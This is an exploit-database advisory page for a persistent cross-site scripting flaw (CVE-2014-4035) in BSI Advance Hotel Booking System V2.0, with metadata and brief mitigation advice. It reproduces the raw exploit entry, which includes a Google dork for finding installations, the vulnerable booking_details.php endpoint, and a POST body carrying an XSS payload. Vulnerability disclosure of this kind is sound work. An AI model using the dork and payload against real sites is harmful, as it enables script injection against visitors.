BSI Advance Hotel Booking System Persistent XSS

vendor:

Hotel Booking System

by:

Angelo Ruwantha

8.8

CVSS

HIGH

Persistent XSS

CWE

Product Name: Hotel Booking System

Affected Version From: V2.0

Affected Version To: V2.0

Patch Exists: YES

Related CWE: CVE-2014-4035

CPE: a:best_soft_inc:hotel_booking_system

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Archlinux

2014

BSI Advance Hotel Booking System Persistent XSS

A persistent XSS vulnerability was discovered in BSI Advance Hotel Booking System V2.0. An attacker can inject malicious JavaScript code into the 'title' parameter of the 'booking_details.php' page via a POST request. This code will be executed in the browser of any user who visits the page.

Mitigation:

Input validation should be used to prevent malicious code from being injected into the 'title' parameter. Additionally, the application should be updated to the latest version.

Source

Exploit-DB raw data:

# Exploit Title:BSI Advance Hotel Booking System Persistent XSS
# Google Dork: intext:Hotel Booking System v2.0 © 2008 - 2012 Copyright Best Soft Inc
# Date: Wed Jun 4 2014
# Exploit Author: Angelo Ruwantha
# Vendor Homepage: http://www.bestsoftinc.com
# Software Link: http://www.bestsoftinc.com/php-advance-hotel-booking-system.html
# Version: V2.0
# Tested on: archlinux
# CVE : CVE-2014-4035

Vulnerability
========================

[+]Method:POST

1.http://URL/hotel-booking/booking_details.php (;persistent XSS)

allowlang=&title=<IMG SRC="javascript:alert('HelloWorld ;)');"&fname=&lname=&str_addr=&city=&state=&zipcode=&country=&phone=&fax=&email=&payment_type=&message=&tos=


every parameter injectable :)